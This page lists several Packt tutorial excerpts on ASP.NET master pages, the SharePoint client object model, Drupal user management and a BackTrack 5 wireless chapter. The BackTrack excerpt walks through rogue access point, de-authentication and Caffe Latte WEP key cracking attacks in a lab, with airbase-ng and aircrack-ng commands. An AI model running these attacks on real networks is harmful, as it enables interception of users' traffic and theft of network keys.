
How-To Tutorials - CMS & E-Commerce

830 Articles

ASP.NET 3.5 CMS: Master Pages, Themes, and Menus

Packt
12 Oct 2011
13 min read
Master Pages

Earlier you were introduced to a feature called Master Pages, but what exactly are they? The idea behind them has been around since the early days of web development: inherit the layout of one page for use in another. It is the same need that kept many developers scrambling with Includes and User Controls. This is where Master Pages come into play. They allow you to lay out a page once and use it over and over. By doing this, you can save yourself countless hours of time, as well as maintain the look and feel of your site from a single place. By implementing a Master Page and using ContentPlaceHolders, your pages keep their continuity throughout the site.

You'll see that the Master Page (SimpleCMS.master) looks similar to a standard .aspx page from ASP.NET, but with some slight differences. In the <%@ ... %> declaration, the Page identifier has been changed to a Master declaration. Here is a standard web page declaration:

```
<%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master" AutoEventWireup="false" CodeFile="Default.aspx.vb" Inherits="_Default" Title="Untitled Page" %>
```

Here is the declaration for a Master Page:

```
<%@ Master Language="VB" CodeFile="SimpleCMS.master.vb" Inherits="SimpleCMS" %>
```

This tells the underlying ASP.NET framework how to handle this special page. If you look at the code-behind for the page, you will also see that it inherits from System.Web.UI.MasterPage instead of the standard System.Web.UI.Page. They function similarly but, as we will cover in more detail later, they have a few distinct differences.

Now, back to the Master Page. Let's take a closer look at the two existing ContentPlaceHolders. The first one you see on the page is the one with the ID of "head". This is a default item that is added automatically to a new Master Page, and its location is also standard: it sits within the HTML <head> tag, which the client's browser handles specially, so that any "child" page can later put things such as JavaScript and style tags into this location. The control's tag contains a minimal number of properties (in reality only four), along with a basic set of events you can tie to. The reason for this is actually pretty straightforward: it doesn't need anything more. ContentPlaceHolder controls aren't really meant to do much from a programming standpoint. They are meant to be placeholders into which other code is injected from the child pages, and this injected code is where all the "real work" takes place. With that in mind, the system acts more as a pass-through, allowing the ContentPlaceHolders to have as little impact on the rest of the site as possible.

Now, back to the existing page, you will see the second preloaded ContentPlaceHolder (ContentPlaceHolder1). Again, this one is added automatically when a new Master Page is created, but its initial position is really just "thrown on the page". The idea is that you will position this one, as well as any others you add, in such a way as to complement the design of your site. You will typically have one for every zone or region of your layout, to allow you to update the contents within each. For simplicity's sake, we'll keep the one-zone approach to the site and use only the two preloaded ContentPlaceHolders, for now at least. ContentPlaceHolder1 is positioned in the current layout so that it encapsulates the main "body" of the site.
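To make this concrete, here is a minimal sketch of what a Master Page along these lines can look like. The table wrapper matches the layout described below, but the exact markup beyond the two ContentPlaceHolders is an illustrative assumption, not the book's listing:

```
<%@ Master Language="VB" CodeFile="SimpleCMS.master.vb" Inherits="SimpleCMS" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>SimpleCMS</title>
    <%-- Child pages can inject scripts and style tags here --%>
    <asp:ContentPlaceHolder ID="head" runat="server" />
</head>
<body>
    <form id="form1" runat="server">
        <table>
            <tr><td><%-- Site header: images, menus, LoginStatus control --%></td></tr>
            <tr><td>
                <%-- Main body: child pages render their content here --%>
                <asp:ContentPlaceHolder ID="ContentPlaceHolder1" runat="server" />
            </td></tr>
            <tr><td><%-- Footer --%></td></tr>
        </table>
    </form>
</body>
</html>
```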
All the child pages will render their content into this section. With that, you will notice that the areas outside this control are really important to the way the site will not only look but also act. Setting up your site headers (images, menus, and so on) is of the utmost importance. Things such as footers, borders, and all the other pieces you interact with on each page are also typically laid out on your Master Page. In the existing example, you will see the LoginStatus1 control placed directly on the Master Page. This is a great way to share that control, and any code/events you may have tied to it, on every page without having to duplicate your code.

There are a few things to keep in mind when putting things together on your Master Page. The biggest is that your child/content page will inherit aspects of your Master Page. Styles, attributes, and layout are just a few of the pieces to keep in mind. Think of the resulting page as a merger of the Master Page and the child/content page. With that in mind, you can begin to understand that when you add something such as a width to the Master Page, the child pages that consume it will be bound by that width. For example, when many people set up their Master Page, they will often use a <table> as their defining container. This is a perfectly good approach and, in fact, is exactly what's done in the example we are working with. Look at the HTML for the Master Page: the whole page, in essence, is wrapped in a <table> tag, and the ContentPlaceHolder is within a <td>. If you were to apply a style attribute to that table and set its width, the children that fill the ContentPlaceHolder would be restricted to working within the confines of that predetermined size. This is not necessarily a bad thing. It makes it easier to work with the child pages in that you don't have to worry about defining their sizes (it's already done for you), and at the same time it lets you handle all the children from this one location. It can also restrict you, for those exact same reasons. You may want a more dynamic approach, and hard-setting these attributes on the Master Page may not be what you are after. These are factors you need to think about before you get too far into designing your site.

Now that you've got a basic understanding of what Master Pages are and how they function on a simple scale, let's take a look at the way they are used from the child/content page. Look at Default.aspx (HTML view). You will notice that this page looks distinctly different from a standard page with no Master Page. Here is what a page looks like when you first add it, with no Master Page:

```
<%@ Page Language="VB" AutoEventWireup="false" CodeFile="Default2.aspx.vb" Inherits="Default2" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>Untitled Page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>
```

Compare this to a new Web Form created with a Master Page selected:
<%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master" AutoEventWireup="false" CodeFile="Default2.aspx.vb" Inherits="Default2" title="Untitled Page" %><asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"></asp:Content><asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"></asp:Content> You will see right away that all the common HTML tags are missing from the page with a Master Page selected. That's because all of these common pieces are being handled in the Master Page and will be rendered from the Master Page. You will also notice that the page with a Master Page also has an additional default attribute added to its page declaration. The title attribute is added so that, when merged and rendered with the Master Page, the page will get the proper title displayed. In addition to the declaration tag differences and the lack of the common HTML tags being absent, the two ContentPlaceHolder tags we defined on the Master Page are automatically referenced through the use of a Content control. These Content controls tie directly to the ContentPlaceHolder tags on the Master Page through the ContentPlaceHolderID attribute. This tells the system where to put the pieces when rendering. The basic idea is that anything between the opening and closing tags of the Content control will be rendered out to the page when being called from a browser. Themes Themes are an extension of another idea, like Master Pages, that has kept developers working long hours. How do you quickly change the look and feel of your site for different users or usages? This is where Themes come in. Themes can be thought of as a container where you store your style sheets, images, and anything else that you may want to interchange in the visual pieces of your site. Themes are folders where you put all of these pieces to group them together. While one user may be visiting your site and seeing it one way, another user can be viewing the exact same site, but get a completely different experience. Let's start off by enabling our site to include the use of Themes. To do this, right-click on the project in the Solutions Explorer, select Add ASP.NET Folder, and then choose Theme from the submenu: The folder will default to Theme1 as its name. I'd suggest that you name this something friendlier though. For now, we will call the Theme as "SimpleCMSTheme". However, later on you may want to add another Theme and give your folders descriptive names, which will really help you keep your work organized. You will see that a Theme is really nothing more than a folder for organizing all the pieces. Let's take a look at what options are available to us. Right-click on the SimpleCMSTheme folder we just created, select Add New Item, and you should see a list similar to this one: Your items may vary depending on your installation, but the key items here are Skin File and Style Sheet. You may already be familiar with stylesheets if you've done any web design work, but let's do a little refresher just in case. Stylesheets, among other uses, are a way to organize all the attributes for your HTML tags. This is really the key feature of stylesheets. You will often see them referenced and called CSS, which stands for Cascading Style Sheets that I'll explain in more detail shortly, but it's also the file extension used when adding a stylesheet to your application. Let's go ahead and add Style Sheet to our site just like the example above. 
For our example, we'll use the default name StyleSheet.css that the system selects. The system will preload your new stylesheet with one element: the body{} element. Let's go ahead and add a simple attribute to this element. Put your cursor between the open "{" and close "}" brackets and press Ctrl+Space; you should get the IntelliSense menu, a list of the attributes that the system recognizes for your element tag. For our testing, let's select the background-color attribute and give it a value of Blue. It should look like this when you are done:

```
body
{
    background-color: Blue;
}
```

Go ahead, save your stylesheet, run the site, and see what happens. If you didn't notice any difference, that's because even though we've now created a Theme for the site and added an attribute to the body element, we've never actually told the site to use this new Theme. Open your web.config and find the <pages> element. It should be located in the <configuration><system.web> section. Select the <pages> element and put your cursor right after the "s", then press the spacebar and the IntelliSense menu should appear. You will see a long list of available items, but the item we are interested in for now is theme. Select it and you will be prompted to enter a value. Put in the name of the Theme we created earlier:

```
<pages theme="SimpleCMSTheme">
```

We've now assigned this Theme to our site with one simple line of text. Save your changes, run the site again, and see what happens. The body element we added to our stylesheet is now read by the system and applied appropriately. View the source on your page and look at how this was applied. The following line is now part of your rendered code:

```
<link href="App_Themes/SimpleCMSTheme/StyleSheet.css" type="text/css" rel="stylesheet" />
```

Now that we've seen how to apply a Theme and how to use a stylesheet within it, let's look at the other key feature of a Theme: the Skin file. A Skin file can be thought of as pre-setting a set of parameters for your controls. It lets you configure multiple attributes, in order to give a certain look and feel to a control, so that you can quickly reuse that look at any time. Let's jump right in and take a look at how it works. Right-click on the SimpleCMSTheme folder we created and select the Skin File option. Go ahead and use the default name of SkinFile.skin for this example. You should get a file like this:

```
<%--
Default skin template. The following skins are provided as examples only.

1. Named control skin. The SkinId should be uniquely defined because
   duplicate SkinId's per control type are not allowed in the same theme.

<asp:GridView runat="server" SkinId="gridviewSkin" BackColor="White" >
    <AlternatingRowStyle BackColor="Blue" />
</asp:GridView>

2. Default skin. The SkinId is not defined. Only one default
   control skin per control type is allowed in the same theme.

<asp:Image runat="server" ImageUrl="~/images/image1.jpg" />
--%>
```

We now have the default Skin file for our site, and Microsoft has even provided a great sample for us. What you see in the example could be translated to say that any GridView added to the site with a SkinID of gridviewSkin will use this named skin. In doing so, these GridViews will all use a BackColor of White and an AlternatingRowStyle BackColor of Blue.
By putting this in a Skin file as part of our Theme, we can apply these attributes, along with many others, to all such controls at one time. This can really save you a lot of development time. As we design the rest of the CMS site, we will continue to revisit these Theme principles and expand on them, so it is good to keep their functionality in mind as we go along.
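As a quick illustration of how a named skin is picked up on a page (a sketch; the GridView ID and its placement are hypothetical, not part of the book's sample site):

```
<%-- On any .aspx page in the themed site, SkinID selects the named skin --%>
<asp:GridView ID="NewsGrid" runat="server" SkinID="gridviewSkin" />

<%-- A GridView with no SkinID would instead pick up the default GridView
     skin, if one is defined in the Theme --%>
```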

Working with Client Object Model in Microsoft Sharepoint

Packt
05 Oct 2011
9 min read
Microsoft SharePoint 2010 is the best-in-class platform for content management and collaboration. With Visual Studio, developers have an end-to-end business solutions development IDE. To leverage this powerful combination of tools it is necessary to understand the different building blocks of SharePoint. In this article by Balaji Kithiganahalli, author of Microsoft SharePoint 2010 Development with Visual Studio 2010 Expert Cookbook, we will cover:

- Creating a list using a Client Object Model
- Handling exceptions
- Calling the Object Model asynchronously

(For more resources on Microsoft SharePoint, see here.)

Introduction

Since the out-of-the-box web services do not provide the full functionality that the server model exposes, developers always end up creating custom web services for use with client applications. But there are situations where deploying custom web services may not be feasible, for example, if your company is hosting SharePoint solutions in a cloud environment where access to the root folder is not permitted. In such cases, developing client applications with the new Client Object Model (OM) becomes a very attractive proposition. SharePoint exposes three OMs, which are as follows:

- Managed
- Silverlight
- JavaScript (ECMAScript)

Each of these OMs provides an object interface to the functionality exposed in the Microsoft.SharePoint namespace. While none of the object models exposes the full functionality that the server-side object model does, an understanding of the server Object Model translates easily into developing applications using an OM.

A managed OM is used to develop custom .NET managed applications (service, WPF, or console applications). You can also use it for ASP.NET applications that are not running in the SharePoint context. A Silverlight OM is used by Silverlight client applications. A JavaScript OM is only available to applications that are hosted inside SharePoint applications, like web part pages or application pages.

Even though each of the OMs provides a different programming interface to build applications, behind the scenes they all call a service named Client.svc to talk to SharePoint. This Client.svc file resides in the ISAPI folder. The service calls are wrapped in an Object Model that developers can use to make calls to the SharePoint server. This way, developers make calls to an OM and the calls are all batched together in XML format to send to the server. The response is always received in JSON format, which is then parsed and associated with the right objects.

The three Object Models come in separate assemblies. The following table provides their locations and names:

| Object OM   | Location          | Names                                                                                            |
|-------------|-------------------|--------------------------------------------------------------------------------------------------|
| Managed     | ISAPI folder      | Microsoft.SharePoint.Client.dll, Microsoft.SharePoint.Client.Runtime.dll                          |
| Silverlight | Layouts\ClientBin | Microsoft.SharePoint.Client.Silverlight.dll, Microsoft.SharePoint.Client.Silverlight.Runtime.dll  |
| JavaScript  | Layouts           | SP.js                                                                                             |

The Client Object Model can be downloaded as a redistributable package from the Microsoft download center at: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=b4579045-b183-4ed4-bf61-dc2f0deabe47

OM functionality focuses on objects at the site collection level and below, the main reason being that it is intended to enhance end-user interaction. Hence the OM is a smaller subset of what is available through the server Object Model.
In all three Object Models, the main object names are kept the same, and hence knowledge of one OM is easily portable to another. As indicated earlier, knowledge of the server Object Model also transfers easily to development using the client OM. The following table shows some of the major objects in the client OM and their equivalent names in the server OM:

| Client OM     | Server OM  |
|---------------|------------|
| ClientContext | SPContext  |
| Site          | SPSite     |
| Web           | SPWeb      |
| List          | SPList     |
| ListItem      | SPListItem |
| Field         | SPField    |

Creating a list using a Managed OM

In this recipe, we will learn how to create a list using the Managed Object Model. We will also add a new column to the list and insert 10 rows of data. For this recipe, we will create a console application that makes use of a generic list template.

Getting ready

Copy the DLLs mentioned earlier to your development machine. Your development machine need not have the SharePoint server installed, but you should be able to access one with proper permissions. You also need the Visual Studio 2010 IDE installed on the development machine.

How to do it…

In order to create a list using a Managed OM, adhere to the following steps:

1. Launch your Visual Studio 2010 IDE as an administrator (right-click the shortcut and select Run as administrator).
2. Select File | New | Project. The new project wizard dialog box will be displayed (make sure to select .NET Framework 3.5 in the top drop-down box).
3. Select Console Application under the Visual C# | Windows node in the Installed Templates section on the left-hand side.
4. Name the project OMClientApplication, provide a directory location where you want to save the project, and click on OK to create the console application template.
5. To add references to Microsoft.SharePoint.Client.dll and Microsoft.SharePoint.Client.Runtime.dll, go to the menu Project | Add Reference, navigate to the location where you copied the DLLs, and select them.
6. Now add the code necessary to create a list. A description field will also be added to our list. Your code should look like the following (make sure to change the URL passed to the ClientContext constructor to your environment):

```csharp
using Microsoft.SharePoint.Client;

namespace OMClientApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            using (ClientContext clientCtx = new ClientContext("http://intsp1"))
            {
                Web site = clientCtx.Web;

                // Create a list.
                ListCreationInformation listCreationInfo = new ListCreationInformation();
                listCreationInfo.Title = "OM Client Application List";
                listCreationInfo.TemplateType = (int)ListTemplateType.GenericList;
                listCreationInfo.QuickLaunchOption = QuickLaunchOptions.On;
                List list = site.Lists.Add(listCreationInfo);

                string DescriptionFieldSchema =
                    "<Field Type='Note' DisplayName='Item Description' Name='Description' " +
                    "Required='True' MaxLength='500' NumLines='10' />";
                list.Fields.AddFieldAsXml(DescriptionFieldSchema, true,
                    AddFieldOptions.AddToDefaultContentType);

                // Insert 10 rows of data - concat the loop id with an "Item number" string.
                for (int i = 1; i < 11; ++i)
                {
                    ListItemCreationInformation listItemCreationInfo = new ListItemCreationInformation();
                    ListItem li = list.AddItem(listItemCreationInfo);
                    li["Title"] = string.Format("Item number {0}", i);
                    li["Item_x0020_Description"] = string.Format("Item number {0} from client Object Model", i);
                    li.Update();
                }

                clientCtx.ExecuteQuery();
                Console.WriteLine("List creation completed");
                Console.Read();
            }
        }
    }
}
```

7. Build and execute the solution by pressing F5 or from the menu Debug | Start Debugging.
This should bring up the command window with a message indicating that the list creation completed. Press Enter and close the command window. Navigate to your site to verify that the list has been created, with the new field and the ten items inserted.

How it works...

The first line of code in the Main method creates an instance of the ClientContext class. The ClientContext instance provides information about the SharePoint server context in which we will be working; it is also the proxy for the server. We passed the URL information to the context to get the entry point to that location. When you have access to the context instance, you can browse the site, web, and list objects of that location, and access all their properties like Name, Title, Description, and so on. The ClientContext class implements the IDisposable interface, hence the using statement; without it you would have to explicitly dispose of the object, and failing to do so will give your application memory leaks. For more information on disposing of objects refer to MSDN at: http://msdn.microsoft.com/en-us/library/ee557362.aspx

From the context we were able to obtain access to our site object, on which we wanted to create the list. We provided list properties for our new list through the ListCreationInformation instance. Through this instance, we set values for list properties like the name, the template we want to use, whether the list should be shown in the quick launch bar, and so on. We added a new field to the field collection of the list by providing the field schema. Each ListItem is created by providing a ListItemCreationInformation. The ListItemCreationInformation is similar to ListCreationInformation; it provides information regarding the list item, like whether it belongs to a document library or not, and so on. For more information on ListCreationInformation and ListItemCreationInformation members, refer to MSDN at: http://msdn.microsoft.com/en-us/library/ee536774.aspx

All of this information is structured as XML and batched together to send to the server. In our case, we created a list and added a new field and ten list items. Each of these has an equivalent server-side call, and hence all these multiple calls were batched together and sent to the server. The request is only sent to the server when we issue an ExecuteQuery or ExecuteQueryAsync method on the client context. The ExecuteQuery method creates an XML request and passes it to Client.svc. The application waits until the batch process on the server is completed and then returns with the JSON response. Client.svc makes the server Object Model calls that execute our request.

There's more...

By default, a ClientContext instance uses Windows authentication. It makes use of the Windows identity of the person executing the application; hence, the person running the application should have proper authorization on the site to execute the commands. Exceptions will be thrown if proper permissions are not available for the user executing the application. We will learn about handling exceptions in the next recipe. ClientContext also supports Anonymous and FBA (ASP.NET forms-based authentication) authentication.
The following is the code for passing FBA credentials if your site supports it:

```csharp
using (ClientContext clientCtx = new ClientContext("http://intsp1"))
{
    clientCtx.AuthenticationMode = ClientAuthenticationMode.FormsAuthentication;
    FormsAuthenticationLoginInfo fba = new FormsAuthenticationLoginInfo("username", "password");
    clientCtx.FormsAuthenticationLoginInfo = fba;
    // Business logic
}
```

Impersonation

In order to impersonate, you can pass credential information to the ClientContext as shown in the following code:

```csharp
clientCtx.Credentials = new NetworkCredential("username", "password", "domainname");
```

Passing credential information this way is supported only in the Managed OM.
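To round out the batching model described above, here is a minimal read-back sketch (not from the book) for the list the recipe created; Load() only queues the request, and nothing goes over the wire until ExecuteQuery() is called:

```csharp
using System;
using Microsoft.SharePoint.Client;

class ReadBack
{
    static void Main()
    {
        // Same hypothetical site URL as in the recipe above.
        using (ClientContext clientCtx = new ClientContext("http://intsp1"))
        {
            List list = clientCtx.Web.Lists.GetByTitle("OM Client Application List");

            // Queue a request for just the properties we need.
            clientCtx.Load(list, l => l.Title, l => l.ItemCount);

            // One round trip: the batched XML request goes to Client.svc here.
            clientCtx.ExecuteQuery();

            Console.WriteLine("{0} contains {1} items", list.Title, list.ItemCount);
        }
    }
}
```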

BackTrack 5: Attacking the Client

Packt
28 Sep 2011
7 min read
(For more resources on BackTrack, see here.)

Honeypot and Mis-Association attacks

Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Along with this list, it will display any networks available in its range. A hacker may do either of two things:

1. Silently monitor the probes and bring up a fake access point with the same ESSID the client is searching for. This will cause the client to connect to the hacker machine, thinking it is the legitimate network.
2. Create fake access points with the same ESSID as neighboring ones to confuse the user into connecting to him.

Such attacks are very easy to conduct in coffee shops and airports where a user might be looking for a Wi-Fi connection. These attacks are called Honeypot attacks, because they rely on Mis-Association to the hacker's access point by a client that believes it is the legitimate one. In the next exercise, we will perform both these attacks in our lab.

Time for action – orchestrating a Mis-Association attack

Follow these instructions to get started:

1. In the previous labs, we used a client that had connected to the Wireless Lab access point. Let us switch on the client but not the actual Wireless Lab access point. Now run airodump-ng mon0 and check the output. You will very soon find the client in not associated mode, probing for Wireless Lab and the other SSIDs in its stored profile (Vivek, in our case).
2. To understand what is happening, let's run Wireshark and start sniffing on the mon0 interface. As expected, you might see a lot of packets that are not relevant to our analysis. Apply a Wireshark filter to display only Probe Request packets from the client MAC you are using. In my case, the filter is wlan.fc.type_subtype == 0x04 && wlan.sa == 60:FB:42:D5:E4:01. You should now see Probe Request packets only from the client, for the SSIDs Vivek and Wireless Lab.
3. Let us now start a fake access point for the network Wireless Lab on the hacker machine (the airbase-ng invocation is reconstructed in the sketch at the end of this section). Within a minute or so, the client connects to us automatically. This shows how easy it is to lure un-associated clients.
4. Now we will try the second case, which is creating a fake access point Wireless Lab in the presence of the legitimate one. Let us turn our access point on to ensure that Wireless Lab is available to the client. For this experiment, we have set the access point channel to 3. Let the client connect to the access point; we can verify this from the airodump-ng screen.
5. Now let us bring up our fake access point with the SSID Wireless Lab. Notice that the client is still connected to the legitimate access point Wireless Lab.
6. We will now send broadcast De-Authentication messages to the client on behalf of the legitimate access point to break their connection.
7. Assuming the signal strength of our fake access point Wireless Lab is stronger than that of the legitimate one at the client, the client connects to our fake access point instead of the legitimate one. We can verify this by looking at the airodump-ng output and seeing the new association of the client with our fake access point.

What just happened?

We just created a Honeypot using the probed list from the client, and also using the same ESSID as that of neighboring access points.
In the first case, the client automatically connected to us as it was searching for the network. In the latter case, as we were closer to the client than the real access point, our signal strength was higher, and the client connected to us.

Have a go hero – forcing a client to connect to the Honeypot

In the preceding exercise, what do we do if the client does not automatically connect to us? We would have to send a De-Authentication packet to break the legitimate client-access point connection, and then, if our signal strength is higher, the client will connect to our spoofed access point. Try this out by connecting a client to a legitimate access point and then forcing it to connect to our Honeypot.

Caffe Latte attack

In the Honeypot attack, we noticed that clients will continuously probe for SSIDs they have connected to previously. If the client had connected to an access point using WEP, operating systems such as Windows cache and store the WEP key. The next time the client connects to the same access point, the Windows wireless configuration manager automatically uses the stored key.

The Caffe Latte attack was invented by me, the author of this book, and was demonstrated at Toorcon 9, San Diego, USA. The Caffe Latte attack is a WEP attack which allows a hacker to retrieve the WEP key of the authorized network using just the client. The attack does not require the client to be anywhere close to the authorized WEP network; it can crack the WEP key using just the isolated client. In the next exercise, we will retrieve the WEP key of a network from a client using the Caffe Latte attack.

Time for action – conducting the Caffe Latte attack

Follow these instructions to get started:

1. Let us first set up our legitimate access point with WEP for the network Wireless Lab, with the key ABCDEFABCDEFABCDEF12 in hex.
2. Let us connect our client to it and ensure that the connection is successful, verifying with airodump-ng.
3. Let us unplug the access point and ensure the client is in the un-associated stage and searching for the WEP network Wireless Lab.
4. Now we use airbase-ng to bring up an access point with Wireless Lab as the SSID and the Caffe Latte parameters set (the invocation is reconstructed in the sketch at the end of this section).
5. As soon as the client connects to this access point, airbase-ng starts the Caffe Latte attack.
6. We now start airodump-ng to collect the data packets from this access point only, as we did before in the WEP-cracking case.
7. We also start aircrack-ng, as in the WEP-cracking exercise we did earlier, to begin the cracking process. The command line would be aircrack-ng filename, where filename is the name of the file created by airodump-ng.
8. Once we have enough WEP-encrypted packets, aircrack-ng succeeds in cracking the key.

What just happened?

We were successful in retrieving the WEP key from just the wireless client, without requiring an actual access point to be used or present in the vicinity. This is the power of the Caffe Latte attack. The attack works by bit-flipping and replaying ARP packets sent by the wireless client after it associates with the fake access point we created. These bit-flipped ARP Request packets cause more ARP Response packets to be sent by the wireless client. Note that all these packets are encrypted using the WEP key stored on the client. Once we are able to gather a large number of these data packets, aircrack-ng is able to recover the WEP key easily.

Have a go hero – practice makes you perfect!

Try changing the WEP key and repeat the attack.
This is a difficult attack and requires some practice to orchestrate successfully. It would also be a good idea to use Wireshark and examine the traffic on the wireless network.
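The exact invocations for these exercises appeared as screenshots. The following shell sketch is a plausible reconstruction using standard aircrack-ng suite options; the interface name, channel, and MAC addresses are lab assumptions:

```
# Mis-Association: fake AP with the probed ESSID on our monitor interface
airbase-ng --essid "Wireless Lab" -c 3 mon0

# Break the client's connection with broadcast de-authentication frames
# (-a is the legitimate AP's BSSID; replace with your lab's value)
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF mon0

# Caffe Latte: fake WEP access point with the attack enabled
# (-W 1 advertises WEP in beacons, -L enables the Caffe Latte attack)
airbase-ng -c 3 -e "Wireless Lab" -W 1 -L mon0

# Capture the resulting traffic from our fake AP only, then crack the key
airodump-ng --channel 3 --bssid <fake AP MAC> --write caffelatte mon0
aircrack-ng caffelatte-01.cap
```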


Drupal 7 Social Networking: Managing Users and Profiles

Packt
27 Sep 2011
9 min read
(For more resources on Drupal, see here.)

What are we going to do and why?

Before we get started, let's take a closer look at what we are going to do in this article and why. At the moment, our users can interact with the website and contribute content, including through their own personal blog. Apart from the blog, there isn't a great deal which differentiates our users; they are simply a username with a blog! One key improvement to make now is to provide customizable user profiles. Our site being a social network with a dinosaur theme, the following would be useful information to have on our users:

- Details of their pet dinosaurs, including:
  - Name
  - Breed
  - Date of birth
  - Hobbies
- Their details for other social networking sites; for example, links to their Facebook profile, Twitter account, or LinkedIn page
- Location of the user (city / area)
- Their web address (if they have their own website)

Some of these can be added to user profiles by adding new fields to profiles using the built-in Field API; however, we will also install some additional modules to extend the default offering.

Many websites allow users to upload an image to associate with their user account, either a photograph or an avatar to represent them. Drupal has provisions for this, but it has some drawbacks which can be fixed using Gravatar. Gravatar is a social avatar service through which users upload their avatar, which is then accessed by other websites that request the avatar using the user's e-mail address. This is convenient for our users, as it saves them having to upload their avatars to our site, and it reduces the amount of data stored on our site, as well as the amount of data transferred to and from it. Since not all users will want to use a third-party service for their avatars (particularly users who are not already signed up to Gravatar), we can let them upload their own avatars if they wish, through the Upload module.

There are many other, more generalized social networking sites out there which don't compete with ours, so we might want to allow our users to promote their profiles for other social networks too. We can download and install the Follow module, which will allow users to publicize their profiles for other social networking sites on their profile on our site.

Once our users get to know each other, they may become more interested in each other's posts and topics and may wish to look up a specific user's contributions to the site. The Tracker module allows users to track one another's contributions. It is a core module, which just needs to be enabled and set up.

Now that we have a better idea of what we are going to do in this article, let's get started!

Getting set up

As this article covers features provided by both core modules and contributed modules (which need to be downloaded first), let's download and enable the modules now, saving us the need to continually download and enable modules throughout the article. The modules which we will require are:

- Tracker (core module)
- Gravatar (can be downloaded from: http://drupal.org/project/gravatar)
- Follow (can be downloaded from: http://drupal.org/project/follow)
- Field_collection (can be downloaded from: http://drupal.org/project/field_collection)
- Entity (can be downloaded from: http://drupal.org/project/entity)
- Trigger (core module)

The contributed modules can be downloaded and their contents extracted to the /sites/all/modules folder within our Drupal installation.
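If you happen to have Drush available on the server, the download-and-enable cycle can also be scripted; this is an aside not covered by the article itself, with the project short names taken from the URLs above:

```
# Download the contributed modules into sites/all/modules
drush dl gravatar follow field_collection entity

# Enable contributed and core modules (tracker and trigger ship with core)
drush en -y gravatar follow field_collection entity tracker trigger
```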
Once extracted, they will be ready to be enabled within the Modules section of our admin area.

Users, roles, and permissions

Let's take a detailed look at users, roles, and permissions and how they all fit together. They are all managed from the People section of the administration area.

User management

Within the People section, users are listed by default on the main screen. These are user accounts which are either created by us, as administrators, or created when a visitor to our site signs up for a user account. From here we can search for particular types of users, create new users, and edit users, including updating their profiles, suspending their accounts, or deleting them permanently from our social network. Once our site starts to gain popularity it will become more difficult for us to navigate through the user list; thankfully, there are search, sort, and filter features available to make this easier. The user list shows, for each user:

- Their username
- Whether their user account is active or blocked (their status)
- The roles which are associated with their account
- How long they have been a member of our community
- When they last accessed our site
- A link to edit the user's account

Users: Viewing, searching, sorting, and filtering

Clicking on a username will take us to the profile of that particular user, allowing us to view their profile as normal. Clicking one of the headings in the user list sorts the list by the field we selected. This could be particularly useful to see who our latest members are, or to see which users are blocked, if we need to reactivate a particular account. We can also filter the user list based on a particular role that is assigned to a user, a particular permission they have (by virtue of their roles), or their status (whether their account is active or blocked). This is managed from the SHOW ONLY USERS WHERE panel.

Creating a user

Within the People area, there is a link, Add user, which allows us to create a new user account for our site. This takes us to the new user page, where we are required to fill out the Username, E-mail address, and Password (twice, to confirm) for the new user account we wish to create. We can also select the status of the user (Active or Blocked) and any roles we wish to apply to their account, and indicate if we want to automatically e-mail the user to notify them of their new account.

Editing a user

To edit a user account we simply need to click the edit link displayed next to the user in the user list. This takes us to a page similar to the create user screen, except that it is pre-populated with the user's details. It also contains a few other settings related to some default installed modules; as we install new modules, the page may include more options.

Inform the user! If you are planning to change a user's username, password, or e-mail address, you should notify them of the change, otherwise they may struggle the next time they try to log in!

Suspending / blocking a user

If we need to block or suspend a user, we can do this from the edit screen by updating their status to Blocked. This prevents the user from accessing our site. For example, if a user had been posting inappropriate material, even after a number of warnings, we could block their account to prevent them from accessing the site.

Why block? Why not just delete?
If we were to simply delete a user who was troublesome on the site, they could simply sign up again (unless we went to a separate area and also blocked their e-mail address and username). Of course, the user could still sign up again using a different e-mail address and a different username, but this helps us keep things under control.

Canceling and deleting a user account

Also within the edit screen is the option to cancel a user's account. On clicking the Cancel account button, we are given a number of options for how we wish to cancel the account. The first and third options will at least keep the context of any discussions or contributions in which the user was involved. The second option will unpublish their content, so that if, for example, removed comments or pages have an impact on the community, we can at least re-enable them. The final option will delete the account and all content associated with it. Finally, we can also select whether the users themselves must confirm that they wish to have their account deleted. This is particularly useful if the cancelation is in response to a request from the user to delete all of their data; they can be given a final chance to change their mind.

Bulk user operations

For occasions when we need to perform specific operations on a range of user accounts (for example, unblocking a number of users, or adding / removing roles from specific users) we can use the Update options panel in the user list. From here we simply select the users we want to apply an action to, and then select one of the following options from the UPDATE OPTIONS list:

- Unblock the selected users
- Block the selected users
- Cancel the selected user accounts
- Add a role to the selected users
- Remove a role from the selected users

Roles

Users are grouped into a number of roles, which in turn have permissions assigned to them. By default there are three roles within Drupal:

- Administrators
- Anonymous users
- Authenticated users

The anonymous and authenticated roles can be edited, but they cannot be renamed or deleted. We can manage user roles by navigating to People | Permissions | Roles. The edit permissions link allows us to edit the permissions associated with a specific role. To create a new role, we simply need to enter the name for the role in the text box provided and click the Add role button.

IBM WebSphere Application Server: Administration Tools

Packt
23 Sep 2011
9 min read
(For more resources on IBM, see here.)

Dumping namespaces

